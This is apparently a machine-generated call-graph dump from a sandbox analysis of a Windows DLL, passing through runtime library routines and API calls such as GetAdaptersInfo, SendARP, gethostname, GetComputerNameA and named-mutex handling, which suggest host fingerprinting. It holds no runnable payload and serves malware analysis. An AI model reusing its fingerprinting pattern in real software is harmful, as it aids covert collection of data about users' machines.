1001185c Sleep ReleaseMutex CloseHandle ReleaseMutex CloseHandle 30731->30732 31277 10011988 30732->31277 31898 1001e1a7 30735->31898 30737 1000749e 30738 100074d2 30737->30738 31913 1000bdb5 112 API calls 3 library calls 30737->31913 31914 1000e7f8 30738->31914 30741 100074f8 TerminateThread CloseHandle 30742 10007509 30741->30742 30743 10007513 TerminateThread CloseHandle 30742->30743 30744 10007524 30742->30744 30743->30744 30746 10007531 WSACleanup 30744->30746 30747 1000752e CloseHandle 30744->30747 30747->30746 30751 100347fa 30748->30751 30750 100347f5 30750->30615 30752 10034804 30751->30752 30753 10034819 30751->30753 30782 10037f1f 68 API calls __getptd_noexit 30752->30782 30756 1003482a 30753->30756 30759 1003484d 30753->30759 30755 10034809 30783 1003b745 9 API calls __filbuf 30755->30783 30780 10034833 30756->30780 30792 10037f1f 68 API calls __getptd_noexit 30756->30792 30784 10037f1f 68 API calls __getptd_noexit 30759->30784 30760 10034814 30760->30750 30761 100348d5 30793 1003b745 9 API calls __filbuf 30761->30793 30763 10034852 30765 1003488b 30763->30765 30766 1003485f 30763->30766 30788 10034714 99 API calls 2 library calls 30765->30788 30785 10034714 99 API calls 2 library calls 30766->30785 30769 10034870 30771 100348c4 30769->30771 30772 10034878 30769->30772 30770 1003489c 30770->30771 30774 100348ae 30770->30774 30771->30780 30791 10037f1f 68 API calls __getptd_noexit 30771->30791 30786 10037f1f 68 API calls __getptd_noexit 30772->30786 30789 10037f1f 68 API calls __getptd_noexit 30774->30789 30775 1003487d 30775->30780 30787 10037f1f 68 API calls __getptd_noexit 30775->30787 30778 100348b3 30778->30780 30790 10037f1f 68 API calls __getptd_noexit 30778->30790 30780->30750 30782->30755 30783->30760 30784->30763 30785->30769 30786->30775 30787->30780 30788->30770 30789->30778 30790->30780 30791->30761 30792->30761 30793->30780 30795 10011386 CoCreateGuid 30794->30795 30835 10039700 30794->30835 30797 100113b3 30795->30797 30798 10011397 __stbuf 30795->30798 30838 10035212 104 API calls 2 library calls 30797->30838 30837 100354d1 106 API calls 7 library calls 30798->30837 30801 100113aa ___DllMainCRTStartup 30802 10001d63 numpunct 69 API calls 30801->30802 30803 10011412 30802->30803 30803->30641 30805 1001c21d __EH_prolog 30804->30805 30806 10001d63 numpunct 69 API calls 30805->30806 30807 1001c23c ___lc_wcstolc 30806->30807 30808 1001c25e GetComputerNameA 30807->30808 30809 1001c285 ___DllMainCRTStartup 30808->30809 30810 10001f26 ___DllMainCRTStartup 69 API calls 30809->30810 30811 1001a721 30810->30811 30812 10032fed 30811->30812 30813 10033009 30812->30813 30814 1003301e 30812->30814 30839 10037f1f 68 API calls __getptd_noexit 30813->30839 30814->30813 30816 10033025 30814->30816 30841 1003b8cd 104 API calls 12 library calls 30816->30841 30818 1003300e 30840 1003b745 9 API calls __filbuf 30818->30840 30819 1003304b 30821 10033019 30819->30821 30842 1003b780 99 API calls 5 library calls 30819->30842 30821->30645 30825 100018ac ___DllMainCRTStartup 30823->30825 30824 10032fed _sprintf 104 API calls 30824->30825 30825->30824 30826 100018ff _memmove 30825->30826 30826->30649 30828 100168fe ___DllMainCRTStartup __EH_prolog 30827->30828 30843 10003137 30828->30843 30830 1001693d ___DllMainCRTStartup 30831 10003256 ___DllMainCRTStartup 69 API calls 30830->30831 30832 1001694d 30831->30832 30847 10002f31 30832->30847 30834 10016959 30834->30656 30836 1003970c 30835->30836 30836->30795 30837->30801 30838->30801 30839->30818 30840->30821 30841->30819 30842->30821 30844 10003148 30843->30844 30846 10003155 30843->30846 30844->30846 30857 10001f9f 30844->30857 30846->30830 30848 10002fc2 30847->30848 30849 10002f46 30847->30849 30866 100324bb 69 API calls 2 library calls 30848->30866 30850 10002fcc 30849->30850 30851 10002f5f 30849->30851 30867 1003248d 69 API calls 2 library calls 30850->30867 30854 10001f9f ___DllMainCRTStartup 69 API calls 30851->30854 30856 10002f70 _memmove 30851->30856 30854->30856 30856->30834 30858 10001ff7 30857->30858 30859 10001fab 30857->30859 30865 1003248d 69 API calls 2 library calls 30858->30865 30863 10001fb9 ___DllMainCRTStartup 30859->30863 30864 10002034 69 API calls 3 library calls 30859->30864 30863->30846 30864->30863 30869 10001ea7 30868->30869 30870 10001f1b 30868->30870 30871 10001eb4 30869->30871 30872 10001ecb 30869->30872 30891 100324bb 69 API calls 2 library calls 30870->30891 30885 10002005 69 API calls ___DllMainCRTStartup 30871->30885 30875 10001f9f ___DllMainCRTStartup 69 API calls 30872->30875 30882 10001ec9 _memmove 30875->30882 30876 10001ebc 30886 10001db3 30876->30886 30882->30670 30885->30876 30887 10001e2a 30886->30887 30890 10001dc4 _memmove 30886->30890 30892 100324bb 69 API calls 2 library calls 30887->30892 30890->30882 30894 1000dd35 ___lc_wcstolc __EH_prolog 30893->30894 30953 10033c98 30894->30953 30897 1000e029 GetLastError 30956 1000c213 30897->30956 30898 1000dd9c 31008 10033eba 85 API calls __fread_nolock 30898->31008 30902 1000ddb0 30905 1000e005 ___DllMainCRTStartup 30902->30905 30906 1000ddce _memmove 30902->30906 30908 10001f26 ___DllMainCRTStartup 69 API calls 30905->30908 30910 10001f26 ___DllMainCRTStartup 69 API calls 30906->30910 30919 1000de97 Mailbox 30906->30919 30911 1000e01b 30908->30911 30915 1000de7a 30910->30915 31018 10033fd2 104 API calls 5 library calls 30911->31018 30915->30919 30923 10001e92 ___DllMainCRTStartup 69 API calls 30915->30923 31009 10033afd 30919->31009 30920 1000e023 Mailbox 30927 10033c98 ___DllMainCRTStartup 148 API calls 30920->30927 30931 1000dfff Mailbox 30920->30931 30923->30919 30924 1000dec3 31014 10034410 GetSystemTimeAsFileTime 30924->31014 30929 1000e0cc 30927->30929 30928 1000deec 31016 100344ab 68 API calls 2 library calls 30928->31016 30932 1000e153 ___DllMainCRTStartup 30929->30932 30933 1000e0d4 30929->30933 30931->30672 30939 10001f26 ___DllMainCRTStartup 69 API calls 30932->30939 30936 10034410 __time64 GetSystemTimeAsFileTime 30933->30936 30934 1000df04 30935 10032fed _sprintf 104 API calls 30934->30935 30937 1000df55 ___DllMainCRTStartup 30935->30937 30938 1000e0da 30936->30938 30942 10001f26 ___DllMainCRTStartup 69 API calls 30937->30942 30940 10011419 ___DllMainCRTStartup 72 API calls 30938->30940 30939->30931 30941 1000e0ee 30940->30941 30943 10032fed _sprintf 104 API calls 30941->30943 30944 1000df75 30942->30944 30946 1000e118 Mailbox 30943->30946 30945 10011419 ___DllMainCRTStartup 72 API calls 30944->30945 30951 1000df93 Mailbox 30944->30951 30945->30951 30946->30946 31019 10034adc 101 API calls 4 library calls 30946->31019 30947 1000dff7 31017 10033fd2 104 API calls 5 library calls 30947->31017 30950 1000e148 31020 10033fd2 104 API calls 5 library calls 30950->31020 30951->30911 30951->30947 31021 10033bd4 30953->31021 30955 1000dd8f 30955->30897 30955->30898 30957 1000c21d __EH_prolog 30956->30957 31114 10009203 30957->31114 30960 1000c24d 31120 1000c390 69 API calls ___DllMainCRTStartup 30960->31120 30962 1000c240 31119 1000952e 81 API calls ___DllMainCRTStartup 30962->31119 30963 1000c24b 30965 10035368 30963->30965 31122 1003537d 30965->31122 30967 1000e051 30968 10015c63 30967->30968 30969 10015c90 ___DllMainCRTStartup 30968->30969 30970 10015c7e 30968->30970 31163 10016085 69 API calls 2 library calls 30969->31163 30971 10009643 ___DllMainCRTStartup 69 API calls 30970->30971 30972 1000e06c 30971->30972 30974 1000c266 30972->30974 30978 1000c279 _strnlen 30974->30978 30975 1000c2ec 31167 100046f1 RaiseException __CxxThrowException@8 30975->31167 30977 1000c2b5 31164 10008b77 69 API calls ___DllMainCRTStartup 30977->31164 30978->30975 30978->30977 30980 1000c2c1 31165 100342e6 68 API calls 3 library calls 30980->31165 30983 1000c2d6 31166 10009dfb RaiseException ___DllMainCRTStartup 30983->31166 30985 1000c2e5 30986 10009643 30985->30986 30987 1000964e 30986->30987 30988 10009676 30987->30988 30989 10009697 30987->30989 30992 1000965c 30987->30992 31168 100342e6 68 API calls 3 library calls 30988->31168 31169 10009d50 69 API calls 3 library calls 30989->31169 30994 1001c12c 30992->30994 30993 1000969c 30999 1001c136 __EH_prolog 30994->30999 30995 1001c1fc Mailbox 30995->30920 31000 1001c185 30999->31000 31003 1001c194 30999->31003 31173 10008b77 69 API calls ___DllMainCRTStartup 30999->31173 31174 1003657a 78 API calls 2 library calls 30999->31174 31000->31003 31175 10009dfb RaiseException ___DllMainCRTStartup 31000->31175 31002 1001c1b4 PathIsDirectoryA 31002->31003 31004 1001c1bf 31002->31004 31003->30995 31003->31002 31170 100364ca 31003->31170 31005 10015c63 ___DllMainCRTStartup 69 API calls 31004->31005 31006 1001c1cc CreateDirectoryA 31005->31006 31176 10004766 31006->31176 31008->30902 31010 10033b06 31009->31010 31186 100360ce 31010->31186 31013 100344ab 68 API calls 2 library calls 31013->30924 31015 1003443e __aulldiv 31014->31015 31015->30928 31016->30934 31017->30931 31018->30920 31019->30950 31020->30931 31024 10033be0 _doexit 31021->31024 31022 10033bf2 31071 10037f1f 68 API calls __getptd_noexit 31022->31071 31024->31022 31026 10033c1f 31024->31026 31025 10033bf7 31072 1003b745 9 API calls __filbuf 31025->31072 31040 10040260 31026->31040 31029 10033c24 31030 10033c3a 31029->31030 31031 10033c2d 31029->31031 31033 10033c63 31030->31033 31034 10033c43 31030->31034 31073 10037f1f 68 API calls __getptd_noexit 31031->31073 31054 10040378 31033->31054 31074 10037f1f 68 API calls __getptd_noexit 31034->31074 31035 10033c02 _doexit @_EH4_CallFilterFunc@8 31035->30955 31041 1004026c _doexit 31040->31041 31042 10037966 __lock 68 API calls 31041->31042 31043 1004027a 31042->31043 31044 100402f1 31043->31044 31049 100379ee __mtinitlocknum 68 API calls 31043->31049 31052 100402ea 31043->31052 31079 1003517b 69 API calls __lock 31043->31079 31080 100351e5 LeaveCriticalSection LeaveCriticalSection _doexit 31043->31080 31081 1003925b 68 API calls _malloc 31044->31081 31047 100402f8 31048 10040307 InitializeCriticalSectionAndSpinCount EnterCriticalSection 31047->31048 31047->31052 31048->31052 31049->31043 31051 10040364 _doexit 31051->31029 31076 1004036f 31052->31076 31062 10040395 31054->31062 31055 100403a9 31086 10037f1f 68 API calls __getptd_noexit 31055->31086 31057 100403ae 31087 1003b745 9 API calls __filbuf 31057->31087 31058 100405ac 31083 10048435 31058->31083 31061 10033c6e 31075 10033c90 LeaveCriticalSection LeaveCriticalSection _fprintf 31061->31075 31062->31055 31070 10040550 31062->31070 31088 10048453 78 API calls __mbsnbcmp_l 31062->31088 31064 10040516 31064->31055 31089 10048580 85 API calls __mbsnbicmp_l 31064->31089 31066 10040549 31066->31070 31090 10048580 85 API calls __mbsnbicmp_l 31066->31090 31068 10040568 31068->31070 31091 10048580 85 API calls __mbsnbicmp_l 31068->31091 31070->31055 31070->31058 31071->31025 31072->31035 31073->31035 31074->31035 31075->31035 31082 10037aca LeaveCriticalSection 31076->31082 31078 10040376 31078->31051 31079->31043 31080->31043 31081->31047 31082->31078 31092 10048322 31083->31092 31085 1004844e 31085->31061 31086->31057 31087->31061 31088->31064 31089->31066 31090->31068 31091->31070 31095 1004832e _doexit 31092->31095 31093 10048340 31111 10037f1f 68 API calls __getptd_noexit 31093->31111 31095->31093 31097 10048377 31095->31097 31096 10048345 31112 1003b745 9 API calls __filbuf 31096->31112 31103 100483e9 31097->31103 31100 10048394 31113 100483bd LeaveCriticalSection __unlock_fhandle 31100->31113 31102 1004834f _doexit 31102->31085 31104 1003c677 ___copy_path_to_wide_string 73 API calls 31103->31104 31105 100483fd 31104->31105 31106 10048403 31105->31106 31107 1004baae __wsopen_helper 131 API calls 31105->31107 31106->31100 31108 10048423 31107->31108 31109 10033984 _free 68 API calls 31108->31109 31110 1004842d 31109->31110 31110->31100 31111->31096 31112->31102 31113->31102 31115 10009210 31114->31115 31116 10009221 31114->31116 31115->30960 31115->30962 31121 100046f1 RaiseException __CxxThrowException@8 31116->31121 31119->30963 31120->30963 31129 10034bce 31122->31129 31126 1003539e 31138 1003b745 9 API calls __filbuf 31126->31138 31128 100353a9 _strrchr 31128->30967 31130 10034bdf 31129->31130 31136 10034c2c 31129->31136 31139 100416ee 31130->31139 31133 10034c0d 31133->31136 31145 10043487 70 API calls 6 library calls 31133->31145 31136->31128 31137 10037f1f 68 API calls __getptd_noexit 31136->31137 31137->31126 31138->31128 31146 10041706 GetLastError 31139->31146 31141 100416f4 31143 10034be4 31141->31143 31160 1003c87f 68 API calls 3 library calls 31141->31160 31143->31133 31144 10043105 76 API calls 5 library calls 31143->31144 31144->31133 31145->31136 31147 1003937d __threadstartex@4 TlsGetValue 31146->31147 31148 1004171b 31147->31148 31149 10041769 SetLastError 31148->31149 31150 10039211 __calloc_crt 65 API calls 31148->31150 31149->31141 31151 1004172e 31150->31151 31151->31149 31161 1003939c TlsSetValue 31151->31161 31153 10041742 31154 10041760 31153->31154 31155 10041748 31153->31155 31157 10033984 _free 65 API calls 31154->31157 31162 10041775 68 API calls 4 library calls 31155->31162 31159 10041766 31157->31159 31158 10041750 GetCurrentThreadId 31158->31149 31159->31149 31161->31153 31162->31158 31163->30972 31164->30980 31165->30983 31166->30985 31168->30992 31169->30993 31177 100364df 31170->31177 31172 100364da 31172->31003 31173->30999 31174->30999 31175->31003 31176->31003 31178 10034bce _LocaleUpdate::_LocaleUpdate 78 API calls 31177->31178 31179 100364f2 31178->31179 31182 10036509 ___from_strstr_to_strchr 31179->31182 31184 10037f1f 68 API calls __getptd_noexit 31179->31184 31181 100364fe 31185 1003b745 9 API calls __filbuf 31181->31185 31182->31172 31184->31181 31185->31182 31187 100360e5 31186->31187 31190 10035eaa 31187->31190 31191 10034bce _LocaleUpdate::_LocaleUpdate 78 API calls 31190->31191 31193 10035ebb 31191->31193 31192 10035ee2 31202 10037f1f 68 API calls __getptd_noexit 31192->31202 31193->31192 31197 10035ef7 31193->31197 31195 10035ee7 31203 1003b745 9 API calls __filbuf 31195->31203 31200 10035f3a 31197->31200 31204 10044f8d 81 API calls 3 library calls 31197->31204 31198 1000deab 31198->31013 31200->31198 31205 10037f1f 68 API calls __getptd_noexit 31200->31205 31202->31195 31203->31198 31204->31197 31205->31198 31207 1001659d ___DllMainCRTStartup 31206->31207 31208 100165a1 31207->31208 31209 100165bf 31207->31209 31213 10016606 69 API calls ___DllMainCRTStartup 31208->31213 31214 10016699 69 API calls ___DllMainCRTStartup 31209->31214 31212 100165bd ___DllMainCRTStartup 31212->30680 31213->31212 31214->31212 31217 10033a37 31216->31217 31224 100339c8 31216->31224 31239 1003d131 DecodePointer 31217->31239 31219 10033a3d 31240 10037f1f 68 API calls __getptd_noexit 31219->31240 31222 100339fb RtlAllocateHeap 31222->31224 31232 10033a2f 31222->31232 31224->31222 31225 10033a23 31224->31225 31229 10033a21 31224->31229 31230 100339d3 31224->31230 31236 1003d131 DecodePointer 31224->31236 31237 10037f1f 68 API calls __getptd_noexit 31225->31237 31238 10037f1f 68 API calls __getptd_noexit 31229->31238 31230->31224 31233 1003cd35 68 API calls __NMSG_WRITE 31230->31233 31234 1003cd92 68 API calls 7 library calls 31230->31234 31235 1003c759 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 31230->31235 31232->30706 31233->31230 31234->31230 31236->31224 31237->31229 31238->31232 31239->31219 31240->31232 31242 10015df2 __EH_prolog 31241->31242 31243 10015e46 31242->31243 31244 10015e05 31242->31244 31245 10015e53 31243->31245 31323 1001610a 69 API calls ___DllMainCRTStartup 31243->31323 31246 10015e21 31244->31246 31321 1001610a 69 API calls ___DllMainCRTStartup 31244->31321 31248 10011849 31245->31248 31324 100169d1 69 API calls 2 library calls 31245->31324 31246->31248 31322 100169d1 69 API calls 2 library calls 31246->31322 31248->30727 31248->30728 31253 10015719 ___lc_wcstolc __EH_prolog 31252->31253 31254 1001c213 ___DllMainCRTStartup 70 API calls 31253->31254 31255 1001577d 31254->31255 31256 10011419 ___DllMainCRTStartup 72 API calls 31255->31256 31257 1001578e 31256->31257 31258 10032fed _sprintf 104 API calls 31257->31258 31259 100157c6 Mailbox ___DllMainCRTStartup 31258->31259 31260 10003256 ___DllMainCRTStartup 69 API calls 31259->31260 31261 100157ed 31260->31261 31262 10001898 ___DllMainCRTStartup 104 API calls 31261->31262 31263 10015807 31262->31263 31264 10001d63 numpunct 69 API calls 31263->31264 31265 10015810 31264->31265 31266 100168f4 ___DllMainCRTStartup 69 API calls 31265->31266 31267 10015820 OpenMutexA GetLastError 31266->31267 31268 1001584f 31267->31268 31270 10015911 ___DllMainCRTStartup 31267->31270 31269 10015858 OpenMutexA GetLastError 31268->31269 31268->31270 31269->31270 31271 1001587a 31269->31271 31272 1001593c ReleaseMutex CloseHandle 31270->31272 31271->31270 31273 10015883 CreateMutexA CreateMutexA GetLastError 31271->31273 31275 100158f6 Mailbox ___DllMainCRTStartup 31272->31275 31274 100158be ReleaseMutex CloseHandle ReleaseMutex CloseHandle 31273->31274 31273->31275 31274->31275 31275->30731 31276->30732 31278 10011992 ___DllMainCRTStartup __EH_prolog 31277->31278 31279 10034410 __time64 GetSystemTimeAsFileTime 31278->31279 31280 100119b3 31279->31280 31281 10011419 ___DllMainCRTStartup 72 API calls 31280->31281 31282 100119c7 31281->31282 31325 10011c4e 31282->31325 31284 100119d8 ___DllMainCRTStartup 31380 10009107 31284->31380 31286 100119fd 31287 10001d63 numpunct 69 API calls 31286->31287 31288 10011a0e 31287->31288 31289 10001d63 numpunct 69 API calls 31288->31289 31290 10011a1f 31289->31290 31291 10002d15 ___DllMainCRTStartup 69 API calls 31290->31291 31292 10011a34 31291->31292 31387 1001be7e 31292->31387 31294 10011a42 ___DllMainCRTStartup 31399 1001bf99 31294->31399 31297 10001d63 numpunct 69 API calls 31298 10011aad 31297->31298 31299 10001d63 numpunct 69 API calls 31298->31299 31300 10011ac1 31299->31300 31301 10001d63 numpunct 69 API calls 31300->31301 31302 10011ad5 31301->31302 31303 10001d63 numpunct 69 API calls 31302->31303 31304 10011ae9 31303->31304 31405 1001ba63 31304->31405 31307 1001ba63 ___DllMainCRTStartup 69 API calls 31308 10011b1e 31307->31308 31309 10001d63 numpunct 69 API calls 31308->31309 31310 10011b30 31309->31310 31311 10002d15 ___DllMainCRTStartup 69 API calls 31310->31311 31312 10011b48 31311->31312 31409 1001b9cf 31312->31409 31315 1001b9cf ___DllMainCRTStartup 72 API calls 31316 10011b73 31315->31316 31420 1000236c 31316->31420 31321->31246 31322->31248 31323->31245 31324->31248 31326 10011c58 __EH_prolog 31325->31326 31432 100021eb GetAdaptersInfo 31326->31432 31329 10011ce1 31444 100022f0 gethostname 31329->31444 31332 10011cd3 31443 100022c4 104 API calls ___DllMainCRTStartup 31332->31443 31335 10015fd9 ___DllMainCRTStartup 69 API calls 31336 10011d04 31335->31336 31337 1001bc82 ___DllMainCRTStartup 72 API calls 31336->31337 31338 10011d18 Mailbox ___DllMainCRTStartup 31337->31338 31452 10008f12 31338->31452 31340 10011d49 ___DllMainCRTStartup 31456 10009053 31340->31456 31343 10009053 ___DllMainCRTStartup 69 API calls 31344 10011ddf 31343->31344 31345 10009053 ___DllMainCRTStartup 69 API calls 31344->31345 31346 10011e18 31345->31346 31346->31346 31347 10009053 ___DllMainCRTStartup 69 API calls 31346->31347 31348 10011e54 31347->31348 31348->31348 31349 10009053 ___DllMainCRTStartup 69 API calls 31348->31349 31350 10011e90 31349->31350 31460 10009f0d 31350->31460 31352 10011eb0 31352->31352 31353 10009053 ___DllMainCRTStartup 69 API calls 31352->31353 31354 10011ede 31353->31354 31355 10009f0d ___DllMainCRTStartup 69 API calls 31354->31355 31356 10011efe 31355->31356 31357 10001d63 numpunct 69 API calls 31356->31357 31358 10011f29 31357->31358 31359 10001d63 numpunct 69 API calls 31358->31359 31372 10011f39 31359->31372 31361 1001215c ___DllMainCRTStartup 31470 10009f88 31361->31470 31363 10012199 31535 10008ebb 31363->31535 31366 10001d63 numpunct 69 API calls 31367 100121aa 31366->31367 31369 10033984 _free 68 API calls 31367->31369 31368 10009f0d 69 API calls ___DllMainCRTStartup 31368->31372 31370 100121bc 31369->31370 31371 10033984 _free 68 API calls 31370->31371 31373 100121d1 Mailbox 31371->31373 31372->31368 31375 10009053 69 API calls ___DllMainCRTStartup 31372->31375 31379 10012136 31372->31379 31464 1000a371 69 API calls 2 library calls 31372->31464 31465 100090a4 69 API calls ___DllMainCRTStartup 31372->31465 31539 10008f9c 31373->31539 31375->31372 31376 10012202 Mailbox 31376->31284 31466 10009005 31379->31466 31381 10009116 31380->31381 31382 1000914a 31380->31382 31383 10001f9f ___DllMainCRTStartup 69 API calls 31381->31383 31604 1003248d 69 API calls 2 library calls 31382->31604 31385 1000911e ___DllMainCRTStartup 31383->31385 31385->31286 31388 1001be88 ___lc_wcstolc __EH_prolog 31387->31388 31389 10032fed _sprintf 104 API calls 31388->31389 31390 1001befd 31389->31390 31391 10001898 ___DllMainCRTStartup 104 API calls 31390->31391 31392 1001bf0c 31391->31392 31393 10001d63 numpunct 69 API calls 31392->31393 31394 1001bf15 ___DllMainCRTStartup 31393->31394 31395 10001f26 ___DllMainCRTStartup 69 API calls 31394->31395 31396 1001bf63 ___DllMainCRTStartup 31395->31396 31397 10001f26 ___DllMainCRTStartup 69 API calls 31396->31397 31398 1001bf7a Mailbox 31397->31398 31398->31294 31400 1001bfa3 __EH_prolog 31399->31400 31605 10002ebf 31400->31605 31402 1001bfe7 ___DllMainCRTStartup 31403 10001db3 ___DllMainCRTStartup 69 API calls 31402->31403 31404 10011a99 31403->31404 31404->31297 31406 1001ba81 ___DllMainCRTStartup 31405->31406 31407 10011b05 31406->31407 31610 100032f8 69 API calls 2 library calls 31406->31610 31407->31307 31410 1001b9d9 __EH_prolog 31409->31410 31411 10015fd9 ___DllMainCRTStartup 69 API calls 31410->31411 31412 1001b9f8 31411->31412 31413 10011b5f 31412->31413 31414 1001ba0c LocalAlloc 31412->31414 31413->31315 31414->31413 31415 1001ba22 MultiByteToWideChar 31414->31415 31417 1001ba41 char_traits 31415->31417 31418 1001658d ___DllMainCRTStartup 69 API calls 31417->31418 31419 1001ba4b LocalFree 31418->31419 31419->31413 31421 10002376 __chsize_nolock ___lc_wcstolc __EH_prolog 31420->31421 31422 1001bc82 ___DllMainCRTStartup 72 API calls 31421->31422 31423 100023b6 31422->31423 31424 1001bc82 ___DllMainCRTStartup 72 API calls 31423->31424 31425 100023c7 31424->31425 31426 10032fed _sprintf 104 API calls 31425->31426 31427 100023f9 Mailbox 31426->31427 31428 10001d63 numpunct 69 API calls 31427->31428 31429 10002426 31428->31429 31611 1000246e 31429->31611 31433 1000221b GlobalAlloc 31432->31433 31434 1000220f 31432->31434 31435 10002214 31433->31435 31436 10002231 GetAdaptersInfo 31433->31436 31434->31433 31434->31435 31435->31329 31442 100022c4 104 API calls ___DllMainCRTStartup 31435->31442 31437 100022b6 GlobalFree 31436->31437 31438 1000223c 31436->31438 31437->31435 31439 10002270 31438->31439 31440 1000225c inet_addr 31438->31440 31439->31437 31440->31438 31441 10002272 inet_addr SendARP 31440->31441 31441->31437 31442->31332 31443->31329 31445 10002316 31444->31445 31446 1000231a ___DllMainCRTStartup 31444->31446 31445->31335 31447 10001f26 ___DllMainCRTStartup 69 API calls 31446->31447 31448 10002336 gethostbyname 31447->31448 31448->31445 31449 10002347 inet_ntoa 31448->31449 31450 1000235c ___DllMainCRTStartup 31449->31450 31451 10001f26 ___DllMainCRTStartup 69 API calls 31450->31451 31451->31445 31453 10008f1c __EH_prolog 31452->31453 31455 10008f69 31453->31455 31545 10033888 31453->31545 31455->31340 31457 1000905d __EH_prolog 31456->31457 31458 10009005 ___DllMainCRTStartup 69 API calls 31457->31458 31459 10009095 31458->31459 31459->31343 31461 10009f17 __EH_prolog 31460->31461 31555 10009461 31461->31555 31464->31372 31465->31372 31467 1000900f __EH_prolog 31466->31467 31468 10009461 ___DllMainCRTStartup 69 API calls 31467->31468 31469 10009044 31468->31469 31469->31361 31471 1000a362 31470->31471 31472 10009fa8 31470->31472 31598 1000a4eb 72 API calls ___DllMainCRTStartup 31471->31598 31474 1000a2f9 31472->31474 31475 10009faf 31472->31475 31596 1000a65b 72 API calls ___DllMainCRTStartup 31474->31596 31476 10009fb6 31475->31476 31477 1000a2ae 31475->31477 31481 1000a1e5 31476->31481 31482 10009fbd 31476->31482 31594 1000a65b 72 API calls ___DllMainCRTStartup 31477->31594 31479 1000a304 31529 1000a013 ___DllMainCRTStartup 31479->31529 31597 1000a811 72 API calls 2 library calls 31479->31597 31588 1000a65b 72 API calls ___DllMainCRTStartup 31481->31588 31485 10009fc4 31482->31485 31486 1000a169 31482->31486 31483 1000a2b9 31483->31529 31595 1000a811 72 API calls 2 library calls 31483->31595 31490 10009fcb 31485->31490 31503 1000a13b ___DllMainCRTStartup 31485->31503 31585 1000a65b 72 API calls ___DllMainCRTStartup 31486->31585 31489 1000a1f0 31495 1000a209 31489->31495 31589 1000ab28 72 API calls 2 library calls 31489->31589 31491 10009fd4 31490->31491 31492 1000a035 31490->31492 31573 1000a65b 72 API calls ___DllMainCRTStartup 31491->31573 31497 1000a07b 31492->31497 31498 1000a03e 31492->31498 31493 1000a174 31499 1000a18a 31493->31499 31586 1000ab28 72 API calls 2 library calls 31493->31586 31590 1000a69a 72 API calls ___DllMainCRTStartup 31495->31590 31504 1000a084 31497->31504 31505 1000a0ac 31497->31505 31575 1000a65b 72 API calls ___DllMainCRTStartup 31498->31575 31587 1000a69a 72 API calls ___DllMainCRTStartup 31499->31587 31502 10009fe8 31502->31529 31574 10008e92 72 API calls ___DllMainCRTStartup 31502->31574 31583 1000a65b 72 API calls ___DllMainCRTStartup 31503->31583 31577 1000a65b 72 API calls ___DllMainCRTStartup 31504->31577 31512 1000a104 31505->31512 31513 1000a0b5 31505->31513 31511 1000a04b 31576 10008e92 72 API calls ___DllMainCRTStartup 31511->31576 31581 1000a65b 72 API calls ___DllMainCRTStartup 31512->31581 31579 1000a65b 72 API calls ___DllMainCRTStartup 31513->31579 31514 1000a1d5 31593 1000a69a 72 API calls ___DllMainCRTStartup 31514->31593 31516 1000a15a 31584 1000a55f 72 API calls ___DllMainCRTStartup 31516->31584 31517 1000a091 31578 10008e92 72 API calls ___DllMainCRTStartup 31517->31578 31521 1000a0c4 31580 10008e92 72 API calls ___DllMainCRTStartup 31521->31580 31524 1000a116 31582 10008e92 72 API calls ___DllMainCRTStartup 31524->31582 31528 10009f88 ___DllMainCRTStartup 72 API calls 31530 1000a1a8 31528->31530 31529->31363 31530->31514 31530->31528 31530->31529 31533 1000a226 ___DllMainCRTStartup 31533->31514 31533->31529 31534 10009f88 ___DllMainCRTStartup 72 API calls 31533->31534 31591 1000a65b 72 API calls ___DllMainCRTStartup 31533->31591 31592 1000a55f 72 API calls ___DllMainCRTStartup 31533->31592 31534->31533 31536 10008ec7 31535->31536 31537 10008ece 31535->31537 31599 1000a811 72 API calls 2 library calls 31536->31599 31537->31366 31540 10008fa6 31539->31540 31541 10008fac 31539->31541 31600 100094e7 31540->31600 31543 10033984 _free 68 API calls 31541->31543 31544 10008fb4 31543->31544 31544->31376 31549 10033890 31545->31549 31546 100339bc _malloc 68 API calls 31546->31549 31547 100338aa 31547->31455 31549->31546 31549->31547 31550 100338ac std::exception::exception 31549->31550 31553 1003d131 DecodePointer 31549->31553 31554 100374ab RaiseException 31550->31554 31552 100338d6 31553->31549 31554->31552 31556 10009470 31555->31556 31557 10009488 31555->31557 31558 10009474 31556->31558 31559 1000948a 31556->31559 31557->31352 31562 10009c01 31558->31562 31566 10009c4e 69 API calls 2 library calls 31559->31566 31563 10009c0f 31562->31563 31564 10009c13 31562->31564 31563->31557 31564->31563 31567 10009e53 31564->31567 31566->31557 31568 10009e60 31567->31568 31569 10009e67 31567->31569 31571 10033888 std::_Facet_Register 69 API calls 31568->31571 31570 10009e89 31569->31570 31572 100339bc _malloc 68 API calls 31569->31572 31570->31563 31571->31569 31572->31570 31573->31502 31574->31529 31575->31511 31576->31529 31577->31517 31578->31529 31579->31521 31580->31529 31581->31524 31582->31529 31583->31516 31584->31529 31585->31493 31586->31499 31587->31530 31588->31489 31589->31495 31590->31533 31591->31533 31592->31533 31593->31529 31594->31483 31595->31529 31596->31479 31597->31529 31598->31529 31599->31537 31602 10009508 31600->31602 31603 100094ef 31600->31603 31601 10033984 _free 68 API calls 31601->31603 31602->31541 31603->31601 31603->31602 31606 10002eca 31605->31606 31607 10002edb 31605->31607 31606->31402 31609 10002fd7 69 API calls ___DllMainCRTStartup 31607->31609 31609->31606 31610->31406 31612 10002478 __EH_prolog 31611->31612 31693 1001a146 31612->31693 31615 10001d63 numpunct 69 API calls 31616 100024a6 31615->31616 31696 1001a61c 31616->31696 31618 100024b6 Mailbox 31619 10001e92 ___DllMainCRTStartup 69 API calls 31618->31619 31620 100024e1 31619->31620 31702 1001a65f 31620->31702 31622 100024f4 Mailbox 31623 10001d63 numpunct 69 API calls 31622->31623 31624 1000250c 31623->31624 31625 10033afd ___DllMainCRTStartup 81 API calls 31624->31625 31626 10002526 ___DllMainCRTStartup 31625->31626 31708 1001a0f8 31626->31708 31716 1001a36c 31626->31716 31627 10002555 31628 100028e2 WSAGetLastError 31627->31628 31629 10002563 31627->31629 31631 1001a6bd ___DllMainCRTStartup 69 API calls 31628->31631 31737 1001a6bd 31629->31737 31638 100028b8 Mailbox ___DllMainCRTStartup 31631->31638 31632 10002575 ___DllMainCRTStartup 31633 10003256 ___DllMainCRTStartup 69 API calls 31632->31633 31634 10002595 ___DllMainCRTStartup 31633->31634 31635 10003256 ___DllMainCRTStartup 69 API calls 31634->31635 31636 100025b1 31635->31636 31637 1001a6bd ___DllMainCRTStartup 69 API calls 31636->31637 31639 